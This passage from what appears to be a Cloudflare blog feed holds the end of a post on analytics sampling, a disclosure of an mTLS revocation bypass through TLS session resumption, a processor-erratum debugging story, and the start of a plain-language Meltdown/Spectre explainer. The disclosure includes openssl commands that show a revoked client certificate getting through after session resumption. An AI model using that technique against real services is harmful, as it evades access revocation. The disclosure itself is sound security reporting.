            <p>After playing with different values for <code><b>pattern</b></code> and <code><b>sample_interval</b></code> in the code above, we realized where the bias was coming from.</p><p>Imagine a person opening a huge generated HTML page with many small/cached resources, such as icons. The first response will be big, immediately followed by a burst of small responses. If the website is not visited that much, responses will tend to end up all together at the start of a batch in Logfwdr. Logreceiver does not cut batches, only concatenates them. The first response remains first, so it always gets picked and skews the estimate up.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2WZUzqCwr2A6WgX1T5UE8z/7a2e08b611fb64e64a61e3d5c792fe23/BLOG-2486_9.png" />
          </figure><p>We checked the hypothesis against the raw unsampled data that we happened to have because that particular website was also using one of the <a href="https://developers.cloudflare.com/logs/"><u>Logs</u></a> products. We took all events in a given time range, and grouped them by cutting at gaps of at least one minute. In each group, we ranked all events by time and looked at the variable of interest (response size in bytes), and put it on a scatter plot against the rank inside the group.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2IXtqGkRjV0xs3wvwx609A/81e67736cacbccdd839c2177769ee4fe/BLOG-2486_10.png" />
          </figure><p>A clear pattern! The first response is much more likely to be larger than average.</p><p>We fixed the issue by making Logreceiver shuffle the data before sampling. As we rolled out the fix, the estimation and the true value converged.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4TL1pKDLw7MA6yGMSCahJN/227cb22054e0e8fe65c7766aa6e4b541/BLOG-2486_11.png" />
          </figure><p>Now, after battle testing it for a while, we are confident the HT estimator is implemented properly and we are using the correct sampling process.</p>
    <div>
      <h3>Using Cloudflare's analytics APIs to query sampled data</h3>
      <a href="#using-cloudflares-analytics-apis-to-query-sampled-data">
        
      </a>
    </div>
    <p>We already power most of our analytics datasets with sampled data. For example, the <a href="https://developers.cloudflare.com/analytics/analytics-engine/"><u>Workers Analytics Engine</u></a> exposes the <a href="https://developers.cloudflare.com/analytics/analytics-engine/sql-api/#sampling"><u>sample interval</u></a> in SQL, allowing our customers to build their own dashboards with confidence bands. In the GraphQL API, all of the data nodes that have "<a href="https://developers.cloudflare.com/analytics/graphql-api/sampling/#adaptive-sampling"><u>Adaptive</u></a>" in their name are based on sampled data, and the sample interval is exposed as a field there as well, though it is not possible to build confidence intervals from that alone. We are working on exposing confidence intervals in the GraphQL API, and as an experiment have added them to the count and edgeResponseBytes (sum) fields on the httpRequestsAdaptiveGroups nodes. This is available under <code><b>confidence(level: X)</b></code>.</p><p>Here is a sample GraphQL query:</p>
            <pre><code>query HTTPRequestsWithConfidence(
  $accountTag: string
  $zoneTag: string
  $datetimeStart: string
  $datetimeEnd: string
) {
  viewer {
    zones(filter: { zoneTag: $zoneTag }) {
      httpRequestsAdaptiveGroups(
        filter: {
          datetime_geq: $datetimeStart
          datetime_leq: $datetimeEnd
      }
      limit: 100
    ) {
      confidence(level: 0.95) {
        level
        count {
          estimate
          lower
          upper
          sampleSize
        }
        sum {
          edgeResponseBytes {
            estimate
            lower
            upper
            sampleSize
          }
        }
      }
    }
  }
}
</code></pre>
            <p>The query above asks for the estimates and the 95% confidence intervals for <code><b>SUM(edgeResponseBytes)</b></code> and <code><b>COUNT</b></code>. The results will also show the sample size, which is good to know, as we rely on the <a href="https://en.wikipedia.org/wiki/Central_limit_theorem"><u>central limit theorem</u></a> to build the confidence intervals, thus small samples don't work very well.</p><p>Here is the response from this query:</p>
            <pre><code>{
  "data": {
    "viewer": {
      "zones": [
        {
          "httpRequestsAdaptiveGroups": [
            {
              "confidence": {
                "level": 0.95,
                "count": {
                  "estimate": 96947,
                  "lower": "96874.24",
                  "upper": "97019.76",
                  "sampleSize": 96294
                },
                "sum": {
                  "edgeResponseBytes": {
                    "estimate": 495797559,
                    "lower": "495262898.54",
                    "upper": "496332219.46",
                    "sampleSize": 96294
                  }
                }
              }
            }
          ]
        }
      ]
    }
  },
  "errors": null
}
</code></pre>
            <p>The response shows the estimated count is 96947, and we are 95% confident that the true count lies in the range 96874.24 to 97019.76. Similarly, the estimate and range for the sum of response bytes are provided.</p><p>The estimates are based on a sample size of 96294 rows, which is plenty of samples to calculate good confidence intervals.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We have discussed what kept our data pipeline scalable and resilient despite doubling in size every 1.5 years, how the math works, and how it is easy to mess up. We are constantly working on better ways to keep the data pipeline, and the products based on it, useful to our customers. If you are interested in doing things like that and want to help us build a better Internet, check out our <a href="http://www.cloudflare.com/careers"><u>careers page</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Data]]></category>
            <category><![CDATA[GraphQL]]></category>
            <category><![CDATA[SQL]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Sampling]]></category>
            <guid isPermaLink="false">64DSvKdN853gq5Bx3Cyfij</guid>
            <dc:creator>Constantin Pan</dc:creator>
            <dc:creator>Jim Hawkridge</dc:creator>
        </item>
        <item>
            <title><![CDATA[mTLS client certificate revocation vulnerability with TLS Session Resumption]]></title>
            <link>https://blog.cloudflare.com/mtls-client-certificate-revocation-vulnerability-with-tls-session-resumption/</link>
            <pubDate>Mon, 03 Apr 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ This blog post outlines the root cause analysis and solution for a bug found in Cloudflare’s mTLS implementation ]]></description>
            <content:encoded><![CDATA[ <p></p><p>On December 16, 2022, Cloudflare discovered a bug where, in limited circumstances, some users with revoked certificates may not have been blocked by Cloudflare firewall settings. Specifically, Cloudflare’s <a href="https://developers.cloudflare.com/firewall/">Firewall Rules solution</a> did not block some users with revoked certificates from resuming a session via <a href="https://www.cloudflare.com/learning/access-management/what-is-mutual-tls/">mutual transport layer security (mTLS)</a>, even if the customer had configured Firewall Rules to do so. This bug has been mitigated, and we have no evidence of this being exploited. We notified any customers that may have been impacted in an abundance of caution, so they can check their own logs to determine if an mTLS protected resource was accessed by entities holding a revoked certificate.</p>
    <div>
      <h3>What happened?</h3>
      <a href="#what-happened">
        
      </a>
    </div>
    <p>One of Cloudflare Firewall Rules’ features, introduced in March 2021, lets customers revoke or block a client certificate, preventing it from being used to authenticate and establish a session. For example, a customer may use Firewall Rules to protect a service by requiring clients to provide a client certificate through the mTLS authentication protocol. Customers could also revoke or disable a client certificate, after which it would no longer be able to be used to authenticate a party initiating an encrypted session via mTLS.</p><p>When Cloudflare receives traffic from an end user, a service at the edge is responsible for terminating the incoming TLS connection. From there, this service is <a href="https://www.cloudflare.com/en-gb/learning/cdn/glossary/reverse-proxy/">a reverse proxy</a>, and it is responsible for acting as a bridge between the end user and various upstreams. Upstreams might include other services within Cloudflare such as Workers or Caching, or may travel through Cloudflare to an external server such as an origin hosting content. Sometimes, you may want to restrict access to an endpoint, ensuring that only authorized actors can access it. Using client certificates is a common way of authenticating users. This is referred to as <i>mutual TLS</i>, because both the server and client provide a certificate. When mTLS is enabled for a specific hostname, this service at the edge is responsible for parsing the incoming client certificate and converting that into metadata that is attached to HTTP requests that are forwarded to upstreams. The upstreams can process this metadata and make the decision whether the client is authorized or not.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2TvrmqDG2SgLoVONCkuao6/37eae4dafac44d112dcc4ca8bcfb4baf/image1-12.png" />
            
            </figure><p>Customers can use the Cloudflare dashboard to <a href="https://developers.cloudflare.com/ssl/client-certificates/revoke-client-certificate/">revoke existing client certificates</a>. Instead of immediately failing handshakes involving revoked client certificates, revocation is optionally enforced via Firewall Rules, which take effect at the HTTP request level. This leaves the decision to enforce revocation with the customer.</p><p>So how exactly does this service determine whether a client certificate is revoked?</p><p>When we see a client certificate presented as part of the TLS handshake, we store the entire certificate chain on the TLS connection. This means that for every HTTP request that is sent on the connection, the client certificate chain is available to the application. When we receive a request, we look at the following fields related to a client certificate chain:</p><ol><li><p>Leaf certificate Subject Key Identifier (SKI)</p></li><li><p>Leaf certificate Serial Number (SN)</p></li><li><p>Issuer certificate SKI</p></li><li><p>Issuer certificate SN</p></li></ol><p>Some of these values are used for upstream processing, but the issuer SKI and leaf certificate SN are used to query our internal data stores for revocation status. The data store indexes on an issuer SKI, and stores a collection of revoked leaf certificate serial numbers. If we find the leaf certificate in this collection, we set the relevant metadata for consumption in Firewall Rules.</p><p>But what does this have to do with TLS session resumption?</p><p>To explain this, let’s first discuss how session resumption works. At a high level, session resumption grants the ability for clients and servers to expedite the handshake process, saving both time and resources. The idea is that if a client and server successfully handshake, then future handshakes are more or less redundant, assuming nothing about the handshake needs to change at a fundamental level (e.g. cipher suite or TLS version).</p><p>Traditionally, there are two mechanisms for session resumption - session IDs and session tickets. In both cases, the TLS server will handle encrypting the context of the session, which is basically a snapshot of the acquired TLS state that is built up during the handshake process. <b>Session IDs</b> work in a stateful fashion, meaning that the server is responsible for saving this state, somewhere, and keying against the session ID. When a client provides a session ID in the client hello, the server checks to see if it has a corresponding session cached. If it does, then the handshake process is expedited and the cached session is restored. In contrast, <b>session tickets</b> work in a stateless fashion, meaning that the server has no need to store the encrypted session context. Instead, the server sends the client the encrypted session context (AKA a session ticket). In future handshakes, the client can send the session ticket in the client hello, which the server can decrypt in order to restore the session and expedite the handshake.</p><p>Recall that when a client presents a certificate, we store the certificate chain on the TLS connection. It was discovered that when sessions were resumed, the code to store the client certificate chain in application data did not run. As a result, we were left with an empty certificate chain, meaning we were unable to check the revocation status and pass this information to firewall rules for further processing.</p><p>To illustrate this, let's use an example where mTLS is used for api.example.com. Firewall Rules are configured to block revoked certificates, and all certificates are revoked. We can reconstruct the client certificate checking behavior using a two-step process. First we use OpenSSL's s_client to perform a handshake using the revoked certificate (recall that revocation has nothing to do with the success of the handshake - it only affects HTTP requests <i>on</i> the connection), and dump the session’s context into a "session.txt" file. We then issue an HTTP request on the connection, which fails with a 403 status code response because the certificate is revoked.</p>
            <pre><code>❯ echo -e "GET / HTTP/1.1\r\nHost:api.example.com\r\n\r\n" | openssl s_client -connect api.example.com:443 -cert cert2.pem -key key2.pem -ign_eof  -sess_out session.txt | grep 'HTTP/1.1'
depth=2 C=IE, O=Baltimore, OU=CyberTrust, CN=Baltimore CyberTrust Root
verify return:1
depth=1 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
verify return:1
depth=0 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
verify return:1
HTTP/1.1 403 Forbidden
^C⏎</code></pre>
            <p>Now, if we reuse "session.txt" to perform session resumption and then issue an identical HTTP request, the request succeeds. This shouldn't happen. We should fail both requests because they both use the same revoked client certificate.</p>
            <pre><code>❯ echo -e "GET / HTTP/1.1\r\nHost:api.example.com\r\n\r\n" | openssl s_client -connect api.example.com:443 -cert cert2.pem -key key2.pem -ign_eof -sess_in session.txt | grep 'HTTP/1.1'
HTTP/1.1 200 OK</code></pre>
            
    <div>
      <h3>How we addressed the problem</h3>
      <a href="#how-we-addressed-the-problem">
        
      </a>
    </div>
    <p>Upon realizing that session resumption led to the inability to properly check revocation status, our first reaction was to disable session resumption for all mTLS connections. This blocked the vulnerability immediately.</p><p>The next step was to figure out how to safely re-enable resumption for mTLS. To do so, we need to remove the requirement of depending on data stored within the TLS connection state. Instead, we can use an API call that will grant us access to the leaf certificate in both session resumption and non session resumption cases. Two pieces of information are necessary: the leaf certificate serial number and the issuer SKI. The issuer SKI is actually included in the leaf certificate, also known as the Authority Key Identifier (AKI). Similar to how one would obtain the SKI for a certificate, <code>X509_get0_subject_key_id</code>, we can use <code>X509_get0_authority_key_id</code> to get the AKI.</p>
    <div>
      <h3>Detailed timeline</h3>
      <a href="#detailed-timeline">
        
      </a>
    </div>
    <p><i>All timestamps are in UTC</i></p><p>In March 2021 we introduced a new feature in Firewall Rules that allows customers to block traffic from revoked mTLS certificates.</p><p>2022-12-16 21:53 - Cloudflare discovers that the vulnerability resulted from a bug whereby certificate revocation status was not checked for session resumptions. Cloudflare begins working on a fix to disable session resumption for all mTLS connections to the edge.2022-12-17 02:20 - Cloudflare validates the fix and starts to roll out a fix globally.2022-12-17 21:07 - Rollout is complete, mitigating the vulnerability.2023-01-12 16:40 - Cloudflare starts to roll out a fix that supports both session resumption and revocation.2023-01-18 14:07 - Rollout is complete.</p><p>In conclusion: once Cloudflare identified the vulnerability, a remediation was put into place quickly. A fix that correctly supports session resumption and revocation has been fully rolled out as of 2023-01-18. After reviewing the logs, Cloudflare has not seen any evidence that this vulnerability has been exploited in the wild.</p> ]]></content:encoded>
            <category><![CDATA[TLS]]></category>
            <category><![CDATA[Bugs]]></category>
            <guid isPermaLink="false">1c0CkT5im0RxAvfTT5PMiA</guid>
            <dc:creator>Rushil Mehra</dc:creator>
        </item>
        <item>
            <title><![CDATA[However improbable: The story of a processor bug]]></title>
            <link>https://blog.cloudflare.com/however-improbable-the-story-of-a-processor-bug/</link>
            <pubDate>Thu, 18 Jan 2018 12:06:48 GMT</pubDate>
            <description><![CDATA[ Processor problems have been in the news lately, due to the Meltdown and Spectre vulnerabilities. But generally, engineers writing software assume that computer hardware operates in a reliable, well-understood fashion, and that any problems lie on the software side of the software-hardware divide. ]]></description>
            <content:encoded><![CDATA[ <p>Processor problems have been in the news lately, due to the <a href="/meltdown-spectre-non-technical/">Meltdown and Spectre vulnerabilities</a>. But generally, engineers writing software assume that computer hardware operates in a reliable, well-understood fashion, and that any problems lie on the software side of the software-hardware divide. Modern processor chips routinely execute many billions of instructions in a second, so any erratic behaviour must be very hard to trigger, or it would quickly become obvious.</p><p>But sometimes that assumption of reliable processor hardware doesn’t hold. Last year at Cloudflare, we were affected by a bug in one of Intel’s processor models. Here’s the story of how we found we had a mysterious problem, and how we tracked down the cause.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/259H08ZlP34cvwO953wEbe/9dfefb01771e3aff180bde9186c3c319/Sherlock_holmes_pipe_hat-1.jpg" />
            
            </figure><p><a href="http://creativecommons.org/licenses/by-sa/3.0/">CC-BY-SA-3.0</a> <a href="https://commons.wikimedia.org/wiki/File:Sherlock_holmes_pipe_hat.jpg">image</a> by Alterego</p>
    <div>
      <h3>Prologue</h3>
      <a href="#prologue">
        
      </a>
    </div>
    <p>Back in February 2017, Cloudflare <a href="/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/">disclosed a security problem</a> which became known as Cloudbleed. The bug behind that incident lay in some code that ran on our servers to parse HTML. In certain cases involving invalid HTML, the parser would read data from a region of memory beyond the end of the buffer being parsed. The adjacent memory might contain other customers’ data, which would then be returned in the HTTP response, and the result was Cloudbleed.</p><p>But that wasn’t the only consequence of the bug. Sometimes it could lead to an invalid memory read, causing the NGINX process to crash, and we had metrics showing these crashes in the weeks leading up to the discovery of Cloudbleed. So one of the measures we took to prevent such a problem happening again was to require that every crash be investigated in detail.</p><p>We acted very swiftly to address Cloudbleed, and so ended the crashes due to that bug, but that did not stop all crashes. We set to work investigating these other crashes.</p>
    <div>
      <h3>Crash is not a technical term</h3>
      <a href="#crash-is-not-a-technical-term">
        
      </a>
    </div>
    <p>But what exactly does “crash” mean in this context? When a processor detects an attempt to access invalid memory (more precisely, an address without a valid page in the page tables), it signals a page fault to the operating system’s kernel. In the case of Linux, these page faults result in the delivery of a SIGSEGV signal to the relevant process (the name SIGSEGV derives from the historical Unix term “segmentation violation”, also known as a segmentation fault or segfault). The default behaviour for SIGSEGV is to terminate the process. It’s this abrupt termination that was one symptom of the Cloudbleed bug.</p><p>This possibility of invalid memory access and the resulting termination is mostly relevant to processes written in C or C++. Higher-level compiled languages, such as Go and JVM-based languages, use type systems which prevent the kind of low-level programming errors that can lead to accesses of invalid memory. Furthermore, such languages have sophisticated runtimes that take advantage of <a href="https://pdos.csail.mit.edu/6.828/2017/readings/appel-li.pdf">page faults for implementation tricks that make them more efficient</a> (a process can install a signal handler for SIGSEGV so that it does not get terminated, and instead can recover from the situation). And for interpreted languages such as Python, the interpreter checks that conditions leading to invalid memory accesses cannot occur. So unhandled SIGSEGV signals tend to be restricted to programming in C and C++.</p><p>SIGSEGV is not the only signal that indicates an error in a process and causes termination. We also saw process terminations due to SIGABRT and SIGILL, suggesting other kinds of bugs in our code.</p><p>If the only information we had about these terminated NGINX processes was the signal involved, investigating the causes would have been difficult. But there is another feature of Linux (and other Unix-derived operating systems) that provided a path forward: core dumps. A core dump is a file written by the operating system when a process is terminated abruptly. It records the full state of the process at the time it was terminated, allowing post-mortem debugging. The state recorded includes:</p><ul><li><p>The processor register values for all threads in the process (the values of some program variables will be held in registers)</p></li><li><p>The contents of the process’ conventional memory regions (giving the values of other program variables and heap data)</p></li><li><p>Descriptions of regions of memory that are read-only mappings of files, such as executables and shared libraries</p></li><li><p>Information associated with the signal that caused termination, such as the address of an attempted memory access that led to a SIGSEGV</p></li></ul><p>Because core dumps record all this state, their size depends upon the program involved, but they can be fairly large. Our NGINX core dumps are often several gigabytes.</p><p>Once a core dump has been recorded, it can be inspected using a debugging tool such as gdb. This allows the state from the core dump to be explored in terms of the original program source code, so that you can inquire about the program stack and contents of variables and the heap in a reasonably convenient manner.</p><p>A brief aside: Why are core dumps called core dumps? It’s a historical term that originated in the 1960s when the principal form of random access memory was <a href="https://en.wikipedia.org/wiki/Magnetic-core_memory">magnetic core memory</a>. At the time, the word core was used as a shorthand for memory, so “core dump” means a dump of the contents of memory.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DW66RVAAUllbxyW26n4oP/9fe72dacf0f67f9a8a79dd4c115ba62a/coremem-2.jpg" />
            
            </figure><p><a href="http://creativecommons.org/licenses/by-sa/3.0/">CC BY-SA 3.0</a> <a href="https://en.wikipedia.org/wiki/Magnetic-core_memory#/media/File:KL_CoreMemory.jpg">image</a> by Konstantin Lanzet</p>
    <div>
      <h3>The game is afoot</h3>
      <a href="#the-game-is-afoot">
        
      </a>
    </div>
    <p>As we examined the core dumps, we were able to track some of them back to more bugs in our code. None of them leaked data as Cloudbleed had, or had other security implications for our customers. Some might have allowed an attacker to try to impact our service, but the core dumps suggested that the bugs were being triggered under innocuous conditions rather than attacks. We didn’t have to fix many such bugs before the number of core dumps being produced had dropped significantly.</p><p>But there were still some core dumps being produced on our servers — about one a day across our whole fleet of servers. And finding the root cause of these remaining ones proved more difficult.</p><p>We gradually began to suspect that these residual core dumps were not due to bugs in our code. These suspicions arose because we found cases where the state recorded in the core dump did not seem to be possible based on the program code (and in examining these cases, we didn’t rely on the C code, but looked at the machine code produced by the compiler, in case we were dealing with compiler bugs). At first, as we discussed these core dumps among the engineers at Cloudflare, there was some healthy scepticism about the idea that the cause might lie outside of our code, and there was at least one joke about <a href="https://www.computerworld.com/article/3171677/it-industry/computer-crash-may-be-due-to-forces-beyond-our-solar-system.html">cosmic rays</a>. But as we amassed more and more examples, it became clear that something unusual was going on. Finding yet another “mystery core dump”, as we had taken to calling them, became routine, although the details of these core dumps were diverse, and the code triggering them was spread throughout our code base. The common feature was their apparent impossibility.</p><p>There was no obvious pattern to the servers which produced these mystery core dumps. We were getting about one a day on average across our fleet of servers. So the sample size was not very big, but they seemed to be evenly spread across all our servers and datacenters, and no one server was struck twice. The probability that an individual server would get a mystery core dump seemed to be very low (about one per ten years of server uptime, assuming they were indeed equally likely for all our servers). But because of our large number of servers, we got a steady trickle.</p>
    <div>
      <h3>In quest of a solution</h3>
      <a href="#in-quest-of-a-solution">
        
      </a>
    </div>
    <p>The rate of mystery core dumps was low enough that it didn’t appreciably impact the service to our customers. But we were still committed to examining every core dump that occurred. Although we got better at recognizing these mystery core dumps, investigating and classifying them was a drain on engineering resources. We wanted to find the root cause and fix it. So we started to consider causes that seemed somewhat plausible:</p><p>We looked at hardware problems. Memory errors in particular are a real possibility. But our servers use ECC (Error-Correcting Code) memory which can detect, and in most cases correct, any memory errors that do occur. Furthermore, any memory errors should be recorded in the IPMI logs of the servers. We do see some memory errors on our server fleet, but they were not correlated with the core dumps.</p><p>If not memory errors, then could there be a problem with the processor hardware? We mostly use Intel Xeon processors, of various models. These have a good reputation for reliability, and while the rate of core dumps was low, it seemed like it might be too high to be attributed to processor errors. We searched for reports of similar issues, and asked on the grapevine, but didn’t hear about anything that seemed to match our issue.</p><p>While we were investigating, an <a href="https://lists.debian.org/debian-devel/2017/06/msg00308.html">issue with Intel Skylake processors</a> came to light. But at that time we did not have Skylake-based servers in production, and furthermore that issue related to particular code patterns that were not a common feature of our mystery core dumps.</p><p>Maybe the core dumps were being incorrectly recorded by the Linux kernel, so that a mundane crash due to a bug in our code ended up looking mysterious? But we didn’t see any patterns in the core dumps that pointed to something like this. Also, upon an unhandled SIGSEGV, the kernel generates a log line with a small amount of information about the cause, like this:</p>
            <pre><code>segfault at ffffffff810c644a ip 00005600af22884a sp 00007ffd771b9550 error 15 in nginx-fl[5600aeed2000+e09000]</code></pre>
            <p>We checked these log lines against the core dumps, and they were always consistent.</p><p>The kernel has a role in controlling the processor’s <a href="https://en.wikipedia.org/wiki/Memory_management_unit">Memory Management Unit</a> to provide virtual memory to application programs. So kernel bugs in that area can lead to surprising results (and we have encountered such a bug at Cloudflare in a different context). But we examined the kernel code, and searched for reports of relevant bugs against Linux, without finding anything.</p><p>For several weeks, our efforts to find the cause were not fruitful. Due to the very low frequency of the mystery core dumps when considered on a per-server basis, we couldn’t follow the usual last-resort approach to problem solving - changing various possible causative factors in the hope that they make the problem more or less likely to occur. We needed another lead.</p>
    <div>
      <h3>The solution</h3>
      <a href="#the-solution">
        
      </a>
    </div>
    <p>But eventually, we noticed something crucial that we had missed until that point: all of the mystery core dumps came from servers containing <a href="https://ark.intel.com/products/91767/Intel-Xeon-Processor-E5-2650-v4-30M-Cache-2_20-GHz">The Intel Xeon E5-2650 v4</a>. This model belongs to the generation of Intel processors that had the codename “Broadwell”, and it’s the only model of that generation that we use in our edge servers, so we simply call these servers Broadwells. The Broadwells made up about a third of our fleet at that time, and they were in many of our datacenters. This explains why the pattern was not immediately obvious.</p><p>This insight immediately threw the focus of our investigation back onto the possibility of processor hardware issues. We downloaded <a href="https://www.intel.co.uk/content/www/uk/en/processors/xeon/xeon-e5-v4-spec-update.html">Intel’s Specification Update</a> for this model. In these Specification Update documents Intel discloses all the ways that its processors deviate from their published specifications, whether due to benign discrepancies or bugs in the hardware (Intel entertainingly calls these “errata”).</p><p>The Specification Update described 85 issues, most of which are obscure issues of interest mainly to the developers of the BIOS and operating systems. But one caught our eye: “BDF76 An Intel® Hyper-Threading Technology Enabled Processor May Exhibit Internal Parity Errors or Unpredictable System Behavior”. The symptoms described for this issue are very broad (“unpredictable system behavior may occur”), but what we were observing seemed to match the description of this issue better than any other.</p><p>Furthermore, the Specification Update stated that BDF76 was fixed in a microcode update. Microcode is firmware that controls the lowest-level operation of the processor, and can be updated by the BIOS (from system vendor) or the OS. Microcode updates can change the behaviour of the processor to some extent (exactly how much is a closely-guarded secret of Intel, although <a href="https://software.intel.com/sites/default/files/managed/c5/63/336996-Speculative-Execution-Side-Channel-Mitigations.pdf">the recent microcode updates to address the Spectre vulnerability</a> give some idea of the impressive degree to which Intel can reconfigure the processor’s behaviour).</p><p>The most convenient way for us to apply the microcode update to our Broadwell servers at that time was via a BIOS update from the server vendor. But rolling out a BIOS update to so many servers in so many data centers takes some planning and time to conduct. Due to the low rate of mystery core dumps, we would not know if BDF76 was really the root cause of our problems until a significant fraction of our Broadwell servers had been updated. A couple of weeks of keen anticipation followed while we awaited the outcome.</p><p>To our great relief, once the update was completed, the mystery core dumps stopped. This chart shows the number of core dumps we were getting each day for the relevant months of 2017:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3swQhL1euB2VpWjtlom4Yh/0be3eebcb41da11502e23af45ce08eb7/coredumps.png" />
            
            </figure><p>As you can see, after the microcode update there is a marked reduction in the rate of core dumps. But we still get some core dumps. These are not mysteries, but represent conventional issues in our software. We continue to investigate and fix them to ensure they don’t represent security issues in our service.</p>
    <div>
      <h3>The conclusion</h3>
      <a href="#the-conclusion">
        
      </a>
    </div>
    <p>Eliminating the mystery core dumps has made it easier to focus on any remaining crashes that are due to our code. It removes the temptation to dismiss a core dump because its cause is obscure.</p><p>And for some of the core dumps that we see now, understanding the cause can be very challenging. They correspond to very unlikely conditions, and often involve a root cause that is distant from the immediate issue that triggered the core dump. For example, we see segfaults in LuaJIT (which we embed in NGINX via OpenResty) that are not due to problems in LuaJIT, but rather because LuaJIT is particularly susceptible to damage to its data structures by bugs in unrelated C code.</p><p><i>Excited by core dump detective work? Or building systems at a scale where once-in-a-decade problems can get triggered every day? Then </i><a href="https://www.cloudflare.com/careers/"><i>join our team</i></a><i>.</i></p> ]]></content:encoded>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[NGINX]]></category>
            <guid isPermaLink="false">39XoGxaU2MKp2cinJiQEXb</guid>
            <dc:creator>David Wragg</dc:creator>
        </item>
        <item>
            <title><![CDATA[An Explanation of the Meltdown/Spectre Bugs for a Non-Technical Audience]]></title>
            <link>https://blog.cloudflare.com/meltdown-spectre-non-technical/</link>
            <pubDate>Mon, 08 Jan 2018 18:57:00 GMT</pubDate>
            <description><![CDATA[ Last week the news of two significant computer bugs was announced. They've been dubbed Meltdown and Spectre and they take advantage of very technical systems that modern CPUs have implemented to make computers extremely fast.  ]]></description>
            <content:encoded><![CDATA[ <p>Last week the news of two significant computer bugs was announced. They've been dubbed Meltdown and Spectre. These bugs take advantage of very technical systems that modern CPUs have implemented to make computers extremely fast. Even highly technical people can find it difficult to wrap their heads around how these bugs work. But, using some analogies, it's possible to understand exactly what's going on with these bugs. If you've found yourself puzzled by exactly what's going on with these bugs, read on — this blog is for you.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3pAwhKX7ooFUF8P1an3cKJ/c18fce014a5a239898207e23a992068b/2-paths--copy_0.5x.png" />
            
            </figure><p>“<i>When you come to a fork in the road, take it.</i>” — Yogi Berra</p><p>Late one afternoon walking through a forest near your home and navigating with the GPS you come to a fork in the path which you’ve taken many times before. Unfortunately, for some mysterious reason your GPS is not working and being a methodical person you like to follow it very carefully.</p><p>Cooling your heels waiting for GPS to start working again is annoying because you are losing time when you could be getting home. Instead of waiting, you decide to make an intelligent guess about which path is most likely based on past experience and set off down right hand path.</p><p>After walking for a short distance the GPS comes to life and tells you which is the correct path. If you predicted correctly then you’ve saved a significant amount of time. If not, then you hop over to the other path and carry on that way.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/24R2l1SOcj5BdVPY3oiUdA/617da4c98bef86495d755ef1dbd57dca/crystal-ball_0.5x.png" />
            
            </figure><p>Something just like this happens inside the CPU in pretty much every computer. Fundamental to the very essence and operation of a computer is the ability to branch, to choose between two different code paths. As you read this, your web browser is making branch decisions continuously (for example, some part of it is waiting for you to click a link to go to some other page).</p><p>One way that CPUs have reached incredible speeds is the ability to predict which of two branches is most likely and start executing it before it knows whether that’s the correct path to take.</p><p>For example, the code that checks for you clicking <a href="https://cloudflare.com/">this link</a> might be a little slow because it’s waiting for mouse movements and button clicks. Rather than wait the CPU will start automatically executing the branch it thinks is most likely (probably that you don’t click the link). Once the check actually indicates “clicked” or “not clicked” the CPU will either continue down the branch it took, or abandon the code it has executed and restart at the ‘fork in the path’.</p><p>This is known as “branch prediction” and saves a great deal of idling processor time. It relies on the ability of the CPU to run code “speculatively” and throw away results if that code should not have been run in the first place.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2F3z5q7TzCLg7YUbjKSmSX/6f1334d111b32d21701e43d1e44d50ac/2-paths-_0.5x-1.png" />
            
            </figure><p>Every time you’ve taken the right hand path in the past it’s been correct, but today it isn’t. Today it’s winter and the foliage is sparser and you’ll see something you shouldn’t down that path: a secret government base hiding alien technology.</p><p>But wanting to get home fast you take the path anyway not realizing that the GPS is going to indicate that left hand path today and keep you out of danger. Before the GPS comes back to life you catch a glimpse of an alien through the trees.</p><p>Moments later two Men In Black appear, erase your memory and dump you back at the fork in the path. Shortly after, the GPS beeps and you set off down the left hand path none the wiser.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1xVmR2maXhqCpTv1emycHQ/be79f1760eaf4742d52e679abdfa28f6/memory-erase-_0.5x-1.png" />
            
            </figure><p>Something similar to this happens in the Spectre/Meltdown attack. The CPU starts executing a branch of code that it has previously learnt is typically the right code to run. But it’s been tricked by a clever attacker and this time it’s the wrong branch. Worse, the code will access memory that it shouldn’t (perhaps from another program) giving it access to otherwise secret information (such as passwords).</p><p>When the CPU realizes it’s gone the wrong way it forgets all the erroneous work it’s done (and the fact that it accessed memory it shouldn’t have) and executes the correct branch instead. Even though illegal memory was accessed what it contained has been forgotten by the CPU.</p><p>The core of Meltdown and Spectre is the ability to <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">exfiltrate information</a>, from this speculatively executed code, concerning the illegally accessed memory through what’s known as a “side channel”.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ZUYu6jBF8RbxSvwfqXHuv/b5b63df0d68a936d8b4efba2d3acdee2/reactor-core-_0.5x.png" />
            
